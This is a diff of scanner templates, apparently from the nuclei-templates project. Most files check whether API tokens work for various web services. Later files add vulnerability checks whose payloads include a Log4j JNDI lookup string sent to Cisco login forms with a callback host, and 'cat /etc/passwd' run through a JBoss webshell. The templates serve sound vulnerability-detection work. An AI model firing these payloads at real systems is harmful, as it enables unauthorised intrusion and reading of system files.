+  name: Scrapestack API Test
+  author: daffainfo
+  severity: info
+  description: Real-time, Scalable Proxy & Web Scraping REST API
+  reference:
+    - https://scrapestack.com/documentation
+    - https://github.com/daffainfo/all-about-apikey/tree/main/scrapestack
+  tags: token-spray,scrapestack
+
+self-contained: true
+requests:
+  - method: GET
+    path:
+      - "https://api.scrapestack.com/scrape?access_key={{token}}&url=https://example.com"
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<title>Example Domain</title>'
diff --git a/token-spray/api-scrapingant.yaml b/token-spray/api-scrapingant.yaml
new file mode 100644
index 0000000000..98d0a00d43
--- /dev/null
+++ b/token-spray/api-scrapingant.yaml
@@ -0,0 +1,31 @@
+id: api-scrapingant
+
+info:
+  name: ScrapingAnt API Test
+  author: daffainfo
+  severity: info
+  description: Headless Chrome scraping with a simple API
+  reference:
+    - https://docs.scrapingant.com/
+    - https://github.com/daffainfo/all-about-apikey/tree/main/scrapingant
+  tags: token-spray,scrapingant
+
+self-contained: true
+requests:
+  - raw:
+      - |
+        POST https://api.scrapingant.com/v1/general HTTP/1.1
+        Host: api.scrapingant.com
+        x-api-key: {{token}}
+        Content-Type: application/json
+
+        {"url": "https://example.com"}
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"content"'
+          - '"cookies"'
+          - '"status_code"'
+        condition: and
diff --git a/token-spray/api-scrapingdog.yaml b/token-spray/api-scrapingdog.yaml
new file mode 100644
index 0000000000..d3522c8d8d
--- /dev/null
+++ b/token-spray/api-scrapingdog.yaml
@@ -0,0 +1,23 @@
+id: api-scrapingdog
+
+info:
+  name: ScrapingDog API Test
+  author: daffainfo
+  severity: info
+  description: Proxy API for Web scraping
+  reference:
+    - https://www.scrapingdog.com/documentation
+    - https://github.com/daffainfo/all-about-apikey/tree/main/scrapingdog
+  tags: token-spray,scrapingdog
+
+self-contained: true
+requests:
+  - method: GET
+    path:
+      - "https://api.scrapingdog.com/scrape?api_key={{token}}&url=https://example.com/ip&dynamic=false"
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<title>Example Domain</title>'
diff --git a/token-spray/api-screenshotapi.yaml b/token-spray/api-screenshotapi.yaml
new file mode 100644
index 0000000000..ef3836abdc
--- /dev/null
+++ b/token-spray/api-screenshotapi.yaml
@@ -0,0 +1,25 @@
+id: api-screenshotapi
+
+info:
+  name: ScreenshotAPI API Test
+  author: daffainfo
+  severity: info
+  description: Create pixel-perfect website screenshots
+  reference:
+    - https://docs.screenshotapi.net/?ref=webflow
+    - https://github.com/daffainfo/all-about-apikey/tree/main/screenshot-api
+  tags: token-spray,screenshotapi
+
+self-contained: true
+requests:
+  - method: GET
+    path:
+      - "https://shot.screenshotapi.net/screenshot?token={{token}}&url=https://example.com"
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'screenshot'
+          - 'url'
+        condition: and
diff --git a/token-spray/api-securitytrails.yaml b/token-spray/api-securitytrails.yaml
new file mode 100644
index 0000000000..a378b4a3bb
--- /dev/null
+++ b/token-spray/api-securitytrails.yaml
@@ -0,0 +1,25 @@
+id: api-securitytrails
+
+info:
+  name: SecurityTrails API Test
+  author: 0ri2N
+  severity: info
+  reference:
+    - https://securitytrails.com
+    - https://docs.securitytrails.com
+    - https://securitytrails.com/corp/api
+  tags: dns,ssl,recon,securitytrails,token-spray
+
+self-contained: true
+requests:
+  - method: GET
+    path:
+      - https://api.securitytrails.com/v1/ping
+    headers:
+      APIKey: "{{token}}"
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - success
diff --git a/token-spray/api-segment.yaml b/token-spray/api-segment.yaml
new file mode 100644
index 0000000000..5c95a6ed11
--- /dev/null
+++ b/token-spray/api-segment.yaml
@@ -0,0 +1,26 @@
+id: api-segment
+
+info:
+  name: Segment API Test
+  author: geeknik
+  severity: info
+  reference:
+    - https://reference.segmentapis.com/
+  tags: token-spray,segment
+
+self-contained: true
+requests:
+  - raw:
+      - |
+        GET https://platform.segmentapis.com/v1beta/workspaces/myworkspace HTTP/1.1
+        Host: platform.segmentapis.com
+        Authorization: Bearer {{token}}
+        Content-Type: application/json
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"name":'
+          - '"id"'
+        condition: and
diff --git a/token-spray/api-sentry.yaml b/token-spray/api-sentry.yaml
new file mode 100644
index 0000000000..f0f802943e
--- /dev/null
+++ b/token-spray/api-sentry.yaml
@@ -0,0 +1,24 @@
+id: api-sentry
+
+info:
+  name: Sentry API Test
+  author: 0ri2N
+  severity: info
+  reference:
+    - https://sentry.io
+    - https://docs.sentry.io
+    - https://docs.sentry.io/api/auth
+  tags: sentry,tracing,tracking,monitoring,token-spray
+
+self-contained: true
+requests:
+  - method: GET
+    path:
+      - "https://sentry.io/api/0/projects/"
+    headers:
+      Authorization: Bearer {{token}}
+
+    matchers:
+      - type: status
+        status:
+          - 200
diff --git a/token-spray/api-serpstack.yaml b/token-spray/api-serpstack.yaml
new file mode 100644
index 0000000000..c394ad0050
--- /dev/null
+++ b/token-spray/api-serpstack.yaml
@@ -0,0 +1,26 @@
+id: api-serpstack
+
+info:
+  name: serpstack API Test
+  author: daffainfo
+  severity: info
+  description: Real-Time & Accurate Google Search Results API
+  reference:
+    - https://serpstack.com/documentation
+    - https://github.com/daffainfo/all-about-apikey/tree/main/serpstack
+  tags: token-spray,serpstack
+
+self-contained: true
+requests:
+  - method: GET
+    path:
+      - "http://api.serpstack.com/search?access_key={{token}}&query=mcdonalds"
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"total_time_taken"'
+          - '"processed_timestamp"'
+          - '"search_url"'
+        condition: and
diff --git a/token-spray/api-shodan.yaml b/token-spray/api-shodan.yaml
new file mode 100644
index 0000000000..aec184fcca
--- /dev/null
+++ b/token-spray/api-shodan.yaml
@@ -0,0 +1,28 @@
+id: api-shodan
+
+info:
+  name: Shodan API Test
+  author: 0ri2N
+  severity: info
+  description: |
+    Shodan is a search engine that lets users search for various types of servers connected to the internet using a variety of filters.
+  reference:
+    - https://shodan.io
+    - https://developer.shodan.io
+    - https://developer.shodan.io/api
+  tags: dns,scan,recon,shodan,token-spray
+
+self-contained: true
+requests:
+  - method: GET
+    path:
+      - https://api.shodan.io/api-info?key={{token}}
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"plan"'
+          - '"unlocked"'
+          - '"scan_credits"'
+        condition: and
diff --git a/token-spray/api-smartsheet.yaml b/token-spray/api-smartsheet.yaml
index 22b0060d1d..be2c55ea7e 100644
--- a/token-spray/api-smartsheet.yaml
+++ b/token-spray/api-smartsheet.yaml
@@ -4,9 +4,10 @@ info:
   name: Smartsheet API Test
   author: daffainfo
   severity: info
+  description: Allows you to programmatically access and Smartsheet data and account information
   reference:
     - https://smartsheet.redoc.ly/
-    - https://github.com/daffainfo/all-about-apikey/blob/main/Business/Smartsheet.md
+    - https://github.com/daffainfo/all-about-apikey/tree/main/smartsheet
   tags: token-spray,smartsheet
 
 self-contained: true
diff --git a/token-spray/api-square.yaml b/token-spray/api-square.yaml
index 99a63c5728..c8f1a946b3 100644
--- a/token-spray/api-square.yaml
+++ b/token-spray/api-square.yaml
@@ -4,8 +4,10 @@ info:
   name: Square API Test
   author: zzeitlin
   severity: info
+  description: Easy way to take payments, manage refunds, and help customers checkout online
   reference:
     - https://developer.squareup.com/explorer/square/locations-api/list-locations
+    - https://github.com/daffainfo/all-about-apikey/tree/main/square
   tags: token-spray,square
 
 self-contained: true
diff --git a/token-spray/api-sslmate.yaml b/token-spray/api-sslmate.yaml
new file mode 100644
index 0000000000..4454c7c339
--- /dev/null
+++ b/token-spray/api-sslmate.yaml
@@ -0,0 +1,28 @@
+id: api-sslmate
+
+info:
+  name: SSLMate API Test
+  author: 0ri2N
+  severity: info
+  reference:
+    - https://sslmate.com
+    - https://sslmate.com/help/
+    - https://sslmate.com/help/reference/apiv2
+  tags: dns,ssl,recon,sslmate,token-spray
+
+self-contained: true
+requests:
+  - method: GET
+    path:
+      - https://sslmate.com/api/v2/certs/interact.sh?expand=current.crt
+    headers:
+      Authorization: Bearer {{token}}
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"exists"'
+          - '"wildcard"'
+          - '"auto_renew"'
+        condition: and
diff --git a/token-spray/api-stytch.yaml b/token-spray/api-stytch.yaml
index d410066fa0..37caf808d3 100644
--- a/token-spray/api-stytch.yaml
+++ b/token-spray/api-stytch.yaml
@@ -4,9 +4,10 @@ info:
   name: Stytch API Test
   author: daffainfo
   severity: info
+  description: User infrastructure for modern applications
   reference:
     - https://stytch.com/docs/api
-    - https://github.com/daffainfo/all-about-apikey/blob/main/Authentication/Stytch.md
+    - https://github.com/daffainfo/all-about-apikey/tree/main/stytch
   tags: token-spray,stytch
 
 self-contained: true
diff --git a/token-spray/api-supportivekoala.yaml b/token-spray/api-supportivekoala.yaml
new file mode 100644
index 0000000000..e6a5ad91e1
--- /dev/null
+++ b/token-spray/api-supportivekoala.yaml
@@ -0,0 +1,29 @@
+id: api-supportivekoala
+
+info:
+  name: Supportivekoala API Test
+  author: daffainfo
+  severity: info
+  description: Autogenerate images with template
+  reference:
+    - https://developers.supportivekoala.com/
+    - https://github.com/daffainfo/all-about-apikey/tree/main/supportivekoala
+  tags: token-spray,supportivekoala
+
+self-contained: true
+requests:
+  - raw:
+      - |
+        GET https://api.supportivekoala.com/v1/images HTTP/1.1
+        Host: api.supportivekoala.com
+        Content-Type: application/json
+        Authorization: Bearer {{token}}
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"_id"'
+          - '"template"'
+          - '"imageUrl"'
+        condition: and
diff --git a/token-spray/api-tatum.yaml b/token-spray/api-tatum.yaml
new file mode 100644
index 0000000000..e90ee49a68
--- /dev/null
+++ b/token-spray/api-tatum.yaml
@@ -0,0 +1,28 @@
+id: api-tatum
+
+info:
+  name: Tatum API Test
+  author: 0ri2N
+  severity: info
+  reference:
+    - https://apidoc.tatum.io/#tag/Node-RPC
+    - https://docs.tatum.io
+  tags: defi,dapp,token-spray,blockchain
+
+self-contained: true
+requests:
+  - method: POST
+    path:
+      - "https://api-eu1.tatum.io/v3/blockchain/node/ETH/{{token}}"
+    headers:
+      Content-Type: application/json
+    body: "{\"jsonrpc\":\"2.0\",\"method\":\"web3_clientVersion\",\"params\":[ ],\"id\":1}"
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"id":'
+          - '"result":'
+          - '"jsonrpc":'
+        condition: and
diff --git a/token-spray/api-thecatapi.yaml b/token-spray/api-thecatapi.yaml
index c6e1d0d1a8..0eb02cde29 100644
--- a/token-spray/api-thecatapi.yaml
+++ b/token-spray/api-thecatapi.yaml
@@ -4,9 +4,10 @@ info:
   name: TheCatApi API Test
   author: daffainfo
   severity: info
+  description: Pictures of cats from Tumblr
   reference:
     - https://docs.thecatapi.com/
-    - https://github.com/daffainfo/all-about-apikey/blob/main/Animals/TheCatApi.md
+    - https://github.com/daffainfo/all-about-apikey/tree/main/thecatapi
   tags: token-spray,thecatapi
 
 self-contained: true
diff --git a/token-spray/api-thedogapi.yaml b/token-spray/api-thedogapi.yaml
index 75db08e1fc..9039557403 100644
--- a/token-spray/api-thedogapi.yaml
+++ b/token-spray/api-thedogapi.yaml
@@ -4,9 +4,10 @@ info:
   name: TheDogApi API Test
   author: daffainfo
   severity: info
+  description: Pictures of dogs from Tumblr
   reference:
     - https://docs.thedogapi.com/
-    - https://github.com/daffainfo/all-about-apikey/blob/main/Animals/TheDogApi.md
+    - https://github.com/daffainfo/all-about-apikey/tree/main/thedogapi
   tags: token-spray,thedogapi
 
 self-contained: true
diff --git a/token-spray/api-todoist.yaml b/token-spray/api-todoist.yaml
new file mode 100644
index 0000000000..55897d1626
--- /dev/null
+++ b/token-spray/api-todoist.yaml
@@ -0,0 +1,28 @@
+id: api-todoist
+
+info:
+  name: Todoist API Test
+  author: daffainfo
+  severity: info
+  description: Todo Lists
+  reference:
+    - https://developer.todoist.com/rest/v1/#overview
+    - https://github.com/daffainfo/all-about-apikey/tree/main/todoist
+  tags: token-spray,todoist
+
+self-contained: true
+requests:
+  - raw:
+      - |
+        GET https://api.todoist.com/rest/v1/projects HTTP/1.1
+        Host: api.todoist.com
+        Authorization: Bearer {{token}}
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "id"
+          - "color"
+          - "name"
+        condition: and
diff --git a/token-spray/api-trello.yaml b/token-spray/api-trello.yaml
index 9815511f71..9362570d61 100644
--- a/token-spray/api-trello.yaml
+++ b/token-spray/api-trello.yaml
@@ -4,9 +4,10 @@ info:
   name: Trello API Test
   author: daffainfo
   severity: info
+  description: Boards, lists and cards to help you organize and prioritize your projects
   reference:
     - https://developers.trello.com/
-    - https://github.com/daffainfo/all-about-apikey/blob/main/Business/Trello.md
+    - https://github.com/daffainfo/all-about-apikey/tree/main/trello
   tags: token-spray,trello
 
 self-contained: true
diff --git a/token-spray/api-urlscan.yaml b/token-spray/api-urlscan.yaml
index 93d5b196db..4b00060e6d 100644
--- a/token-spray/api-urlscan.yaml
+++ b/token-spray/api-urlscan.yaml
@@ -4,9 +4,10 @@ info:
   name: URLScan API Test
   author: daffainfo
   severity: info
+  description: Scan and Analyse URLs
   reference:
     - https://urlscan.io/docs/api/
-    - https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/URLScan.md
+    - https://github.com/daffainfo/all-about-apikey/tree/main/urlscan
   tags: token-spray,urlscan
 
 self-contained: true
diff --git a/token-spray/api-virustotal.yaml b/token-spray/api-virustotal.yaml
index fbcb6e2600..b7978cf03c 100644
--- a/token-spray/api-virustotal.yaml
+++ b/token-spray/api-virustotal.yaml
@@ -6,7 +6,7 @@ info:
   severity: info
   reference:
     - https://developers.virustotal.com/reference
-    - https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/VirusTotal.md
+    - https://github.com/daffainfo/all-about-apikey/blob/main/Anti%20Malware/VirusTotal.md
   tags: token-spray,virustotal
 
 self-contained: true
@@ -24,7 +24,7 @@ requests:
       - type: word
         part: body
         words:
-          - "'verbose_msg':"
-          - "'scan_date':"
-          - "'permalink':"
+          - '"verbose_msg":'
+          - '"scan_date":'
+          - '"permalink":'
         condition: and
diff --git a/token-spray/api-web3storage.yaml b/token-spray/api-web3storage.yaml
index f2102664bc..170e2ed34a 100644
--- a/token-spray/api-web3storage.yaml
+++ b/token-spray/api-web3storage.yaml
@@ -4,9 +4,10 @@ info:
   name: Web3 Storage API Test
   author: daffainfo
   severity: info
+  description: File Sharing and Storage for Free with 1TB Space
   reference:
     - https://docs.web3.storage/
-    - https://github.com/daffainfo/all-about-apikey/blob/main/Cloud%20Storage%20-%20File%20Sharing/Web3%20Storage.md
+    - https://github.com/daffainfo/all-about-apikey/tree/main/web3-storage
   tags: token-spray,web3storage
 
 self-contained: true
diff --git a/token-spray/api-wordcloud.yaml b/token-spray/api-wordcloud.yaml
index 860ab73d73..b5889e3e5f 100644
--- a/token-spray/api-wordcloud.yaml
+++ b/token-spray/api-wordcloud.yaml
@@ -4,9 +4,10 @@ info:
   name: Word Cloud API Test
   author: daffainfo
   severity: info
+  description: Easily create word clouds
   reference:
     - https://wordcloudapi.com/getting-started
-    - https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/Word%20Cloud.md
+    - https://github.com/daffainfo/all-about-apikey/tree/main/word-cloud
   tags: token-spray,wordcloud
 
 self-contained: true
diff --git a/token-spray/api-wordnik.yaml b/token-spray/api-wordnik.yaml
new file mode 100644
index 0000000000..dfe89ce8f9
--- /dev/null
+++ b/token-spray/api-wordnik.yaml
@@ -0,0 +1,26 @@
+id: api-wordnik
+
+info:
+  name: Wordnik API Test
+  author: daffainfo
+  severity: info
+  description: Dictionary Data
+  reference:
+    - https://developer.wordnik.com/docs
+    - https://github.com/daffainfo/all-about-apikey/tree/main/wordnik
+  tags: token-spray,wordnik
+
+self-contained: true
+requests:
+  - method: GET
+    path:
+      - "https://api.wordnik.com/v4/word.json/hedgehog/topExample?useCanonical=false&api_key={{token}}"
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"provider"'
+          - '"year"'
+          - '"rating"'
+        condition: and
diff --git a/token-spray/api-zenrows.yaml b/token-spray/api-zenrows.yaml
new file mode 100644
index 0000000000..9f25423c48
--- /dev/null
+++ b/token-spray/api-zenrows.yaml
@@ -0,0 +1,23 @@
+id: api-zenrows
+
+info:
+  name: ZenRows API Test
+  author: daffainfo
+  severity: info
+  description: Web Scraping API that bypasses anti-bot solutions while offering JS rendering, and rotating proxies
+  reference:
+    - https://www.zenrows.com/documentation/
+    - https://github.com/daffainfo/all-about-apikey/tree/main/zenrows
+  tags: token-spray,zenrows
+
+self-contained: true
+requests:
+  - method: GET
+    path:
+      - "https://api.zenrows.com/v1/?apikey={{token}}&url=https://example.com"
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<title>Example Domain</title>'
diff --git a/token-spray/api-zoomeye.yaml b/token-spray/api-zoomeye.yaml
new file mode 100644
index 0000000000..b0c0d64dd8
--- /dev/null
+++ b/token-spray/api-zoomeye.yaml
@@ -0,0 +1,29 @@
+id: api-zoomeye
+
+info:
+  name: ZoomEye API Test
+  author: 0ri2N
+  severity: info
+  description: |
+    ZoomEyeis a Cyberspace Search Engine recording information of devices, websites, services and components etc.
+  reference:
+    - https://zoomeye.org
+    - https://zoomeye.org/doc
+  tags: dns,scan,recon,zoomeye,token-spray
+
+self-contained: true
+requests:
+  - method: GET
+    path:
+      - https://api.zoomeye.org/resources-info
+    headers:
+      API-KEY: "{{token}}"
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"plan"'
+          - '"stats"'
+          - '"user_info"'
+        condition: and
diff --git a/token-spray/google-books.yaml b/token-spray/google-books.yaml
index 5e3a013f47..c31889881a 100644
--- a/token-spray/google-books.yaml
+++ b/token-spray/google-books.yaml
@@ -4,9 +4,10 @@ info:
   name: Google Books API Test
   author: daffainfo
   severity: info
+  description: Google Books
   reference:
     - https://developers.google.com/books/docs/overview
-    - https://github.com/daffainfo/all-about-apikey/blob/main/Books/Google%20Books.md
+    - https://github.com/daffainfo/all-about-apikey/tree/main/google-books
   tags: token-spray,google,books
 
 self-contained: true
diff --git a/token-spray/google-safebrowsing.yaml b/token-spray/google-safebrowsing.yaml
new file mode 100644
index 0000000000..22cff513cc
--- /dev/null
+++ b/token-spray/google-safebrowsing.yaml
@@ -0,0 +1,27 @@
+id: api-safebrowsing
+
+info:
+  name: Google Safe Browsing API Test
+  author: daffainfo
+  severity: info
+  description: Google Link/Domain Flagging
+  reference:
+    - https://developers.google.com/books/docs/overview
+    - https://github.com/daffainfo/all-about-apikey/tree/main/google-safe-browsing
+  tags: token-spray,google,books
+
+self-contained: true
+requests:
+  - raw:
+      - |
+        POST https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?key={{token}} HTTP/1.1
+        Host: safebrowsing.googleapis.com
+        Content-Type: application/json
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"clientId"'
+          - '"clientVersion"'
+        condition: and
\ No newline at end of file
diff --git a/vulnerabilities/apache/apache-flink-unauth-rce.yaml b/vulnerabilities/apache/apache-flink-unauth-rce.yaml
index 1d02291740..ddf35e73ce 100644
--- a/vulnerabilities/apache/apache-flink-unauth-rce.yaml
+++ b/vulnerabilities/apache/apache-flink-unauth-rce.yaml
@@ -1,13 +1,18 @@
 id: apache-flink-unauth-rce
 
 info:
-  name: Apache Flink Unauth RCE
+  name: Apache Flink - Remote Code Execution
   author: pikpikcu
   severity: critical
-  reference:
+  description: Apache Flink
+  reference: Apache Flink contains an unauthenticated remote code execution vulnerability.
     - https://www.exploit-db.com/exploits/48978
     - https://adamc95.medium.com/apache-flink-1-9-x-part-1-set-up-5d85fd2770f3
     - https://github.com/LandGrey/flink-unauth-rce
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10.0
+    cwe-id: CWE-77
   tags: apache,flink,rce,intrusive,unauth
 
 requests:
@@ -40,3 +45,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/05/23
diff --git a/vulnerabilities/apache/apache-ofbiz-log4j-rce.yaml b/vulnerabilities/apache/apache-ofbiz-log4j-rce.yaml
index d86db343ec..4b00ef9d93 100644
--- a/vulnerabilities/apache/apache-ofbiz-log4j-rce.yaml
+++ b/vulnerabilities/apache/apache-ofbiz-log4j-rce.yaml
@@ -1,10 +1,24 @@
 id: apache-ofbiz-log4j-rce
 
 info:
-  name: Apache OFBiz Log4j JNDI RCE
+  name: Apache OFBiz - Log4j JNDI Remote Code Execution
   author: pdteam
   severity: critical
-  tags: ofbiz,oast,log4j,rce,apache,jndi
+  description: |
+    Apache OFBiz is affected by a remote code execution vulnerability in the bundled Apache Log4j logging library. Apache Log4j is vulnerable due to insufficient protections on message lookup substitutions when dealing with user controlled input. A remote, unauthenticated attacker can exploit this, via a web request, to execute arbitrary code with the permission level of the running Java process.
+  reference:
+    - https://issues.apache.org/jira/browse/OFBIZ-12449
+    - https://ofbiz.apache.org/
+    - https://logging.apache.org/log4j/2.x/security.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-44228
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10.0
+    cwe-id: CWE-77
+  remediation: Upgrade to Apache OFBiz version 8.12.03 or later.
+  metadata:
+    shodan-query: http.html:"Apache OFBiz"
+  tags: cve,cve2021,ofbiz,oast,log4j,rce,apache,jndi
 
 requests:
   - raw:
@@ -31,3 +45,5 @@ requests:
         group: 1
         regex:
           - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'   # Print extracted ${hostName} in output
+
+# Enhanced by mp on 2022/05/27
diff --git a/vulnerabilities/apache/apache-solr-file-read.yaml b/vulnerabilities/apache/apache-solr-file-read.yaml
index 390f09194e..ccb3629709 100644
--- a/vulnerabilities/apache/apache-solr-file-read.yaml
+++ b/vulnerabilities/apache/apache-solr-file-read.yaml
@@ -1,13 +1,18 @@
 id: apache-solr-file-read
 
 info:
-  name: Apache Solr <= 8.8.1 Arbitrary File Read
+  name: Apache Solr <= 8.8.1 - Local File Inclusion
   author: DhiyaneshDk
   severity: high
+  description: Apache Solr versions prior to and including 8.8.1 are vulnerable to local file inclusion.
   reference:
     - https://twitter.com/Al1ex4/status/1382981479727128580
     - https://nsfocusglobal.com/apache-solr-arbitrary-file-read-and-ssrf-vulnerability-threat-alert/
     - https://twitter.com/sec715/status/1373472323538362371
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
   tags: apache,solr,lfi
 
 requests:
@@ -40,4 +45,6 @@ requests:
 
       - type: regex
         regex:
-          - "root:.*:0:0:"
\ No newline at end of file
+          - "root:.*:0:0:"
+
+# Enhanced by mp on 2022/07/22
diff --git a/vulnerabilities/apache/apache-solr-log4j-rce.yaml b/vulnerabilities/apache/apache-solr-log4j-rce.yaml
index bd31144333..abf4b4ee68 100644
--- a/vulnerabilities/apache/apache-solr-log4j-rce.yaml
+++ b/vulnerabilities/apache/apache-solr-log4j-rce.yaml
@@ -1,15 +1,25 @@
 id: apache-solr-log4j-rce
 
 info:
-  name: Apache Solr Log4j JNDI RCE
+  name: Apache Solr 7+ - Log4j Remote Code Execution
   author: Evan Rubinstein,nvn1729
   severity: critical
-  description: Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. This vulnerability affects Solr 7+.
+  description: |
+    Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. This vulnerability affects Solr 7+.
   reference:
     - https://solr.apache.org/security.html#apache-solr-affected-by-apache-log4j-cve-2021-44228
     - https://twitter.com/sirifu4k1/status/1470011568834424837
     - https://github.com/apache/solr/pull/454
-  tags: solr,oast,log4j,rce,apache,jndi
+    - https://logging.apache.org/log4j/2.x/security.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-44228
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10.0
+    cwe-id: CWE-77
+  metadata:
+    verified: true
+    shodan-query: http.html:"Apache Solr"
+  tags: cve,cve2021,solr,oast,log4j,rce,apache,jndi
 
 requests:
   - method: GET
@@ -34,3 +44,5 @@ requests:
         group: 1
         regex:
           - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'   # Print extracted ${hostName} in output
+
+# Enhanced by mp on 2022/05/27
diff --git a/vulnerabilities/backdoor/jexboss-backdoor.yaml b/vulnerabilities/backdoor/jexboss-backdoor.yaml
new file mode 100644
index 0000000000..249a62ac2d
--- /dev/null
+++ b/vulnerabilities/backdoor/jexboss-backdoor.yaml
@@ -0,0 +1,40 @@
+id: jexboss-backdoor
+
+info:
+  name: Jexboss Backdoor Webshell
+  author: UnkL4b
+  severity: critical
+  reference:
+    - https://us-cert.cisa.gov/ncas/analysis-reports/AR18-312A
+    - https://github.com/joaomatosf/jexboss
+  metadata:
+    verified: true
+  tags: backdoor,jboss,rce
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/jexws/jexws.jsp?ppp={{url_encode('{{command}}')}}"
+      - "{{BaseURL}}/jexws4/jexws4.jsp?ppp={{url_encode('{{command}}')}}"
+      - "{{BaseURL}}/jexinv4/jexinv4.jsp?ppp={{url_encode('{{command}}')}}"
+      - "{{BaseURL}}/jbossass/jbossass.jsp?ppp={{url_encode('{{command}}')}}"
+
+    payloads:
+      command:
+        - "cat /etc/passwd"
+        - "type C:\\/Windows\\/win.ini"
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - "root:.*:0:0:"
+          - "\\[(font|extension|file)s\\]"
+        condition: or
+
+      - type: word
+        part: header
+        words:
+          - "X-Powered-By: Servlet"
diff --git a/vulnerabilities/cisco/cisco-unified-communications-log4j.yaml b/vulnerabilities/cisco/cisco-unified-communications-log4j.yaml
new file mode 100644
index 0000000000..ed64d9a21d
--- /dev/null
+++ b/vulnerabilities/cisco/cisco-unified-communications-log4j.yaml
@@ -0,0 +1,52 @@
+id: cisco-unified-communications-log4j
+
+info:
+  name: Cisco Unified Communications - Remote Code Execution (Apache Log4j)
+  author: DhiyaneshDK
+  severity: critical
+  reference:
+    - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd
+    - https://logging.apache.org/log4j/2.x/security.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-44228
+  metadata:
+    verified: true
+    shodan-query: title:"Cisco Unified"
+  tags: cve,cve2021,rce,jndi,log4j,cisco
+
+requests:
+  - raw:
+      - |
+        POST /ccmadmin/j_security_check HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
+        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+        Accept-Language: en-US,en;q=0.5
+        Accept-Encoding: gzip, deflate
+        Content-Type: application/x-www-form-urlencoded
+        Origin: {{BaseURL}}
+        Referer: {{BaseURL}}/ccmadmin/showHome.do
+
+        appNav=ccmadmin&j_username=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}&j_password=admin
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol  # Confirms the DNS Interaction
+        words:
+          - "dns"
+
+      - type: regex
+        part: interactsh_request
+        regex:
+          - '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+'  # Match for extracted ${sys:os.name} variable
+
+    extractors:
+      - type: kval
+        kval:
+          - interactsh_ip # Print remote interaction IP in output
+
+      - type: regex
+        part: interactsh_request
+        group: 1
+        regex:
+          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'  # Print extracted ${sys:os.name} in output
diff --git a/vulnerabilities/cisco/cisco-vmanage-log4j.yaml b/vulnerabilities/cisco/cisco-vmanage-log4j.yaml
new file mode 100644
index 0000000000..045cc73040
--- /dev/null
+++ b/vulnerabilities/cisco/cisco-vmanage-log4j.yaml
@@ -0,0 +1,53 @@
+id: cisco-vmanage-log4j
+
+info:
+  name: Cisco vManage - Remote Code Execution (Apache Log4j)
+  author: DhiyaneshDK
+  severity: critical
+  description: Cisco SD-WAN vManage is affected by the following critical vulnerability in the Apache Log4j Java logging library as described in the cisco-sa-apache-log4j-qRuKNEbd advisory
+  reference:
+    - https://www.tenable.com/plugins/nessus/161212
+    - https://logging.apache.org/log4j/2.x/security.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-44228
+  metadata:
+    verified: true
+    shodan-query: title:"vManage"
+  tags: log4j,cisco,tenable,cve,cve2021,rce,jndi
+
+requests:
+  - raw:
+      - |
+        POST /j_security_check HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
+        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+        Accept-Language: en-US,en;q=0.5
+        Accept-Encoding: gzip, deflate
+        Content-Type: application/x-www-form-urlencoded
+        Origin: {{BaseURL}}
+        Referer: {{BaseURL}}
+
+        j_username=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}&j_password=admin&submit=Log+In
+
+    matchers-condition: and
+    matchers:
